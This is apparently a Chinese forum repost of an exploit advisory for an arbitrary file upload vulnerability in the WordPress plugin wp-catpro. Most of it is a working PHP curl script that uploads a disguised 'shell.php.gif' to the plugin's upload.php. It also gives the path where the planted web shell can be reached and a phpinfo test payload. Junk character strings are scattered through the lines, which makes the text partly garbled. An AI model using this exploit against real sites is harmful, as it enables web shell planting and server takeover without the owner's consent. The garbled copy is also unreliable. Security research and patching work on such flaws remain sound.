WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
: i' o7 v% N. ~- Q+ j7 y4 S#-----------------------------------------------------------------------

作者  => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
+ ^& R# M: l5 P下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
& J4 t+ b9 B; w0 x2 L/ [" w####
$ |( |1 V& e6 M
#=> Exploit 信息:
3 O* ]2 O4 B8 `3 V------------------
# 攻击者可以上传 file/shell.php.gif
- U# I, O8 L$ {7 t# ("jpg", "gif", "png")  // Allowed file extensions
( G: g3 o/ G0 p: R% O# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

+ V7 S# r, Y1 m" S#=> Exploit
-----------
5 ^' @  F! a$ O" O8 t# D& {0 A# v<?php
- T% K. |6 a+ c% P+ Z
! Y; y# V5 p: C3 P7 C+ ]4 v$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
. d2 S; u. {: b$ b$ n- ~curl_setopt($ch, CURLOPT_POST, true);
/ p# l5 K$ r2 _$ f0 s5 c% Jcurl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
4 M6 B+ z+ h' o2 Bcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- A, [) p( y, f1 a: I$postResult = curl_exec($ch);
, H" S. h+ E8 C+ ~* C5 rcurl_close($ch);
% A! l+ a2 R2 y5 d( r
print "$postResult";

$ M1 d3 X  O7 W9 M: t, P) n. LShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
+ |; {/ Q5 s8 X5 _) I( o  ?>
6 O& [& P' b( Y, z6 B1 Y<?php
phpinfo();
1 Z# c8 f5 E2 F* |+ V/ x9 |?>